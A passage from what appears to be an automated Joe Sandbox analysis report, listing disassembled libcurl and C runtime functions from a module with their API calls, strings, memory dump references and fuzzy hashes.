                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: 5c81b0d392007bdb8623f5f53d87cd63a2ebd1bcbe08a8a685c1eb7b12bd8707
                                                                                                                                  • Instruction ID: c9bb4325c6bef49abc3e409c2b3a8ad7b9c1d88b7c3399d9971b57a45c20609c
                                                                                                                                  • Opcode Fuzzy Hash: 5c81b0d392007bdb8623f5f53d87cd63a2ebd1bcbe08a8a685c1eb7b12bd8707
                                                                                                                                  • Instruction Fuzzy Hash: DC117036E68A013BDA055A789C96F3A235E9BD677CB200274F13986198DF3DC8014150
                                                                                                                                  Function 6B90E5D0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(6B8FF03B,?,6B8D669E,6B8FF03B,?,?,?,?), ref: 6B90E5E5
                                                                                                                                  • __alldvrm.LIBCMT ref: 6B90E5FE
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B90E627
                                                                                                                                  • GetTickCount.KERNEL32 ref: 6B90E642
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1296068966-0
                                                                                                                                  • Opcode ID: 28518d982a97e1b54d33fd30608cef95aa40fdfb83dec46c129726430cdcf266
                                                                                                                                  • Instruction ID: a2d71a0f2adc0341da61985ced57829002fe857cea35690389eee46099d6f698
                                                                                                                                  • Opcode Fuzzy Hash: 28518d982a97e1b54d33fd30608cef95aa40fdfb83dec46c129726430cdcf266
                                                                                                                                  • Instruction Fuzzy Hash: D2119172A08208BFCB149FB8DD85A69BFE8EB4D304B1081BEB90DC7250E636D911DB40
                                                                                                                                  Function 6B9385FF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,6B935102,00000000,00000001,00000000,00000000,?,6B92E891,?,6B9292EA,00000000), ref: 6B938616
                                                                                                                                  • GetLastError.KERNEL32(?,6B935102,00000000,00000001,00000000,00000000,?,6B92E891,?,6B9292EA,00000000,?,00000000,?,6B92EDE5,?), ref: 6B938622
                                                                                                                                    • Part of subcall function 6B9385E8: CloseHandle.KERNEL32(FFFFFFFE,6B938632,?,6B935102,00000000,00000001,00000000,00000000,?,6B92E891,?,6B9292EA,00000000,?,00000000), ref: 6B9385F8
                                                                                                                                  • ___initconout.LIBCMT ref: 6B938632
                                                                                                                                    • Part of subcall function 6B9385AA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6B9385D9,6B9350EF,00000000,?,6B92E891,?,6B9292EA,00000000,?), ref: 6B9385BD
                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,6B935102,00000000,00000001,00000000,00000000,?,6B92E891,?,6B9292EA,00000000,?), ref: 6B938647
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                  • Opcode ID: e09f8e5fa06413a3a761be5d7c9aa16be86abd3acb627247833438240891b43e
                                                                                                                                  • Instruction ID: 2ad77029e1fad6901a4eb409ca45c0f8462222b5f3dd59dc1a82d8f5777ed9e8
                                                                                                                                  • Opcode Fuzzy Hash: e09f8e5fa06413a3a761be5d7c9aa16be86abd3acb627247833438240891b43e
                                                                                                                                  • Instruction Fuzzy Hash: 4EF03037404564BFCF232FD5CC45A9E3F7AEF493A5B004060FA18C6120DB32D860AB91
                                                                                                                                  Function 6B8DAE10 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DAE35
                                                                                                                                  Strings
                                                                                                                                  • Can't get the size of %s, xrefs: 6B8DAF14
                                                                                                                                  • Can't open %s for writing, xrefs: 6B8DAE9E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                                                  • String ID: Can't get the size of %s$Can't open %s for writing
                                                                                                                                  • API String ID: 601868998-3544860555
                                                                                                                                  • Opcode ID: 0de6093cef6a28ab54df3c6d4ccc49210984f4f3e90174a8b4f7e5718c679395
                                                                                                                                  • Instruction ID: 15d0c1c4678462ffc8aa767f2cbb90a674e03541e6a0070f24d64be9376e9f52
                                                                                                                                  • Opcode Fuzzy Hash: 0de6093cef6a28ab54df3c6d4ccc49210984f4f3e90174a8b4f7e5718c679395
                                                                                                                                  • Instruction Fuzzy Hash: 2C81E6B5E002088BDB14DFB8DC816EEB7B5EF58314F20497EE90A97340EB39AD558B51
                                                                                                                                  Function 6B8E4190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_url_set.LIBCURL(?,00000002,00000000,00000080), ref: 6B8E432A
                                                                                                                                  Strings
                                                                                                                                  • Couldn't find host %s in the .netrc file; using defaults, xrefs: 6B8E42FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_url_set
                                                                                                                                  • String ID: Couldn't find host %s in the .netrc file; using defaults
                                                                                                                                  • API String ID: 1103260265-3983049644
                                                                                                                                  • Opcode ID: 1c01a5707d6ff33534a780ba7a696bc7d3feea04d9767878ebf0a9103e51c7c5
                                                                                                                                  • Instruction ID: ad08d1f7992dd6cec9cee4c36218efca2ff5c77c23cfd46231213220fa956418
                                                                                                                                  • Opcode Fuzzy Hash: 1c01a5707d6ff33534a780ba7a696bc7d3feea04d9767878ebf0a9103e51c7c5
                                                                                                                                  • Instruction Fuzzy Hash: F361F431A04245ABEF118F28D8057DDBBE0AF47315F0804E9EC6C9B292D37A9965CBB1
                                                                                                                                  Function 6B8D6020 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 173COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(Set-Cookie:,00000000,0000000B,?,?,?,00000000), ref: 6B8D615B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal
                                                                                                                                  • String ID: Set-Cookie:$none
                                                                                                                                  • API String ID: 482932555-3629594122
                                                                                                                                  • Opcode ID: 2bdd073c98a27b3f11a727c5208a5e46616abfdefe73630a4920c0a304b7cab5
                                                                                                                                  • Instruction ID: db35789820e6d1efa2b55edbd2d48798ea639d590d736132a5a0a896713f296b
                                                                                                                                  • Opcode Fuzzy Hash: 2bdd073c98a27b3f11a727c5208a5e46616abfdefe73630a4920c0a304b7cab5
                                                                                                                                  • Instruction Fuzzy Hash: 8551297594839D6AEF014A385C4679A3BA55F53308F0408FAED45AB243EB7EC949C372
                                                                                                                                  Function 6B8D1BE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000080,%ld%s,?,?), ref: 6B8D1C85
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000080,%ld%s,?,?), ref: 6B8D1D46
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: %ld%s
                                                                                                                                  • API String ID: 1809024409-3503459407
                                                                                                                                  • Opcode ID: bc3edf61d235dbd4d3631eed6764a4a49dc2892f0257a5c8b44c2bd3e31185ea
                                                                                                                                  • Instruction ID: 65968abc335cc98a5025f104e8d67b849862c9e98f2a878c1cfbe2a124ebaf90
                                                                                                                                  • Opcode Fuzzy Hash: bc3edf61d235dbd4d3631eed6764a4a49dc2892f0257a5c8b44c2bd3e31185ea
                                                                                                                                  • Instruction Fuzzy Hash: 95512774904614ABD725DF34CC41BE6B7F8FF05304F0049AAE99D87241DB39AA45CB60
                                                                                                                                  Function 6B8E8840 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B8E87E0: curl_msnprintf.LIBCURL(?,00000007,:%u,?,00000000,?,?,?,6B8E7CB2,?,?,?,00000106,?,00000000), ref: 6B8E8830
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000007,:%u,?,0000002A,?,?,?,?,?,00000000,00000000), ref: 6B8E88CF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: :%u$Hostname in DNS cache was stale, zapped
                                                                                                                                  • API String ID: 1809024409-2924501231
                                                                                                                                  • Opcode ID: 98b5160f0095908b681c0388d14312494be196a8b2a341e937ed726249113643
                                                                                                                                  • Instruction ID: e55072de20bd82e6af3c513beaa810ea887f8f1167507c41ca63042c0e0a75b5
                                                                                                                                  • Opcode Fuzzy Hash: 98b5160f0095908b681c0388d14312494be196a8b2a341e937ed726249113643
                                                                                                                                  • Instruction Fuzzy Hash: E9412335E0021DABCB18DF38CC41AEEB779EF46308F0046E9D95953201DB35AA56CFA1
                                                                                                                                  Function 6B91D790 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(6B952F90,6B953058,%s%s%s%s,6B93C4B0,6B948024,?,6B948020), ref: 6B91D84F
                                                                                                                                  • _strncpy.LIBCMT ref: 6B91D8AF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strncpycurl_msnprintf
                                                                                                                                  • String ID: %s%s%s%s
                                                                                                                                  • API String ID: 37059441-8588819
                                                                                                                                  • Opcode ID: 79a61b3e41befeab8c99d5f043d39b6d7db35ae77e52dbb63839e15371a4b097
                                                                                                                                  • Instruction ID: d652a57b2628074732b7d702bece78d1bac6bc5451209d0385452aa2c506002d
                                                                                                                                  • Opcode Fuzzy Hash: 79a61b3e41befeab8c99d5f043d39b6d7db35ae77e52dbb63839e15371a4b097
                                                                                                                                  • Instruction Fuzzy Hash: 0931C377B8C21D6BDB08CF689C91BAAB7A99F56284F1041FDEC09D7341D639DD0487A0
                                                                                                                                  Function 6B8E4080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B90E5D0: QueryPerformanceCounter.KERNEL32(6B8FF03B,?,6B8D669E,6B8FF03B,?,?,?,?), ref: 6B90E5E5
                                                                                                                                    • Part of subcall function 6B90E5D0: __alldvrm.LIBCMT ref: 6B90E5FE
                                                                                                                                    • Part of subcall function 6B90E5D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B90E627
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8E40E3
                                                                                                                                  Strings
                                                                                                                                  • Too old connection (%ld seconds), disconnect it, xrefs: 6B8E40FF
                                                                                                                                  • Connection %ld seems to be dead!, xrefs: 6B8E415B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery__alldvrm
                                                                                                                                  • String ID: Connection %ld seems to be dead!$Too old connection (%ld seconds), disconnect it
                                                                                                                                  • API String ID: 3283211967-2324667105
                                                                                                                                  • Opcode ID: 0078b69b006eb42465e693d3b0dd3daa0d6ae98cf02f6c2a4ea9a19f8443144c
                                                                                                                                  • Instruction ID: b1cd85f1d7c524e4e2fb90b0e543928332fb16366510ec74599b63e62bb293d9
                                                                                                                                  • Opcode Fuzzy Hash: 0078b69b006eb42465e693d3b0dd3daa0d6ae98cf02f6c2a4ea9a19f8443144c
                                                                                                                                  • Instruction Fuzzy Hash: 05314071E042096BDB005E3C8C43B9A7764EFA732CF540654F82C672C2E779A4A583E1
                                                                                                                                  Function 6B8FDB40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_slist_append.LIBCURL(00000000,Content-Type: application/dns-message,0000013C,00000000,00000440,?,00000000,00000000,?,6B8E8617,00000000,00000000,?,00000000), ref: 6B8FDB87
                                                                                                                                  • curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?), ref: 6B8FDC0D
                                                                                                                                  Strings
                                                                                                                                  • Content-Type: application/dns-message, xrefs: 6B8FDB74
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_slist_appendcurl_slist_free_all
                                                                                                                                  • String ID: Content-Type: application/dns-message
                                                                                                                                  • API String ID: 2220803400-4173715026
                                                                                                                                  • Opcode ID: 98766c2aca1f01500c8e275308a9461cd4fe4c05639d837de7561fd136d96642
                                                                                                                                  • Instruction ID: 97504f55f87f67db0e7b3da6eda47b78c7d74dd0f51356cde298c664a310d652
                                                                                                                                  • Opcode Fuzzy Hash: 98766c2aca1f01500c8e275308a9461cd4fe4c05639d837de7561fd136d96642
                                                                                                                                  • Instruction Fuzzy Hash: A82105B2A40B04ABE7118F75EC41BE7B7EDFF05388F000819EA1E93251E33AA511CB90
                                                                                                                                  Function 6B8ECB10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(?,?,6B8EC897,?,?,?,?,6B8ECC18,?,6B8EC897,?,?,6B8EC897,?,?,00000000), ref: 6B8ECB64
                                                                                                                                  • curl_strnequal.LIBCURL(HTTP/,?,00000005,?,?,?,?,6B8ECC18,?,6B8EC897,?,?,6B8EC897,?,?,00000000), ref: 6B8ECBA5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal
                                                                                                                                  • String ID: HTTP/
                                                                                                                                  • API String ID: 482932555-2417072641
                                                                                                                                  • Opcode ID: 1fc6d372776b66832d28b515e02f9090e615568907879f73dce297540bd6911a
                                                                                                                                  • Instruction ID: 4f84e696ef58ededa9acdc05de39aa677326e17ca49147ce7c4cabe99a0a9fb8
                                                                                                                                  • Opcode Fuzzy Hash: 1fc6d372776b66832d28b515e02f9090e615568907879f73dce297540bd6911a
                                                                                                                                  • Instruction Fuzzy Hash: 0B113B37F042145FCB014E1C9C406AA77E6EBC7354B0949B9EC59DB203D635EC464BE0
                                                                                                                                  Function 6B8DC540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_easy_strerror.LIBCURL(00000000), ref: 6B8DC579
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_easy_strerror
                                                                                                                                  • String ID: Failure sending QUIT command: %s$QUIT
                                                                                                                                  • API String ID: 1399792982-1162443993
                                                                                                                                  • Opcode ID: 2ac8d6d1b80450f85c81fca1c4e7c75c2c269634486deeb7e6da1b738ca27821
                                                                                                                                  • Instruction ID: 86cb37390e07f611bc9890738c9c43ca8f6694ca326ece1a0e760e50aafab255
                                                                                                                                  • Opcode Fuzzy Hash: 2ac8d6d1b80450f85c81fca1c4e7c75c2c269634486deeb7e6da1b738ca27821
                                                                                                                                  • Instruction Fuzzy Hash: 1221F135548B50AAE7119B74C806B86BBF8BF0630CF00096AE45D97152DBBDF055CFA1
                                                                                                                                  Function 6B8DCA30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strstr
                                                                                                                                  • String ID: ;type=
                                                                                                                                  • API String ID: 2882301372-3507045495
                                                                                                                                  • Opcode ID: 02bcd200c3e7670c66d6a6a89d0672ad448ab23dc7f8109d9fe8ecac518ff21c
                                                                                                                                  • Instruction ID: 84a504961c900762ea8a339118b59a3a21352e3be18b7abf09bab65256f9d9b6
                                                                                                                                  • Opcode Fuzzy Hash: 02bcd200c3e7670c66d6a6a89d0672ad448ab23dc7f8109d9fe8ecac518ff21c
                                                                                                                                  • Instruction Fuzzy Hash: 4F1138B65443559ED720CF28D844781BFE4AB02368F04067BDC5D8F282C77AE9448BF1
                                                                                                                                  Function 6B8F0780 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000005,%c%03d,-00000041,?,00000000), ref: 6B8F07D2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: %c%03d$%s %s
                                                                                                                                  • API String ID: 1809024409-883683383
                                                                                                                                  • Opcode ID: 66330c2774ff32ce65df69676b1dd1c04a8a5ca91f68980ce30565f6f90a10e6
                                                                                                                                  • Instruction ID: 789d8811c692ced6fea5fea502288d5af5d3359aa3b595e6b434cf69ae8f2675
                                                                                                                                  • Opcode Fuzzy Hash: 66330c2774ff32ce65df69676b1dd1c04a8a5ca91f68980ce30565f6f90a10e6
                                                                                                                                  • Instruction Fuzzy Hash: B501F5B6A0411A7BD6099A34AC82FBBBB6EEF9535CF040015F90C57100EB79BA154EF2
                                                                                                                                  Function 6B8D33D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
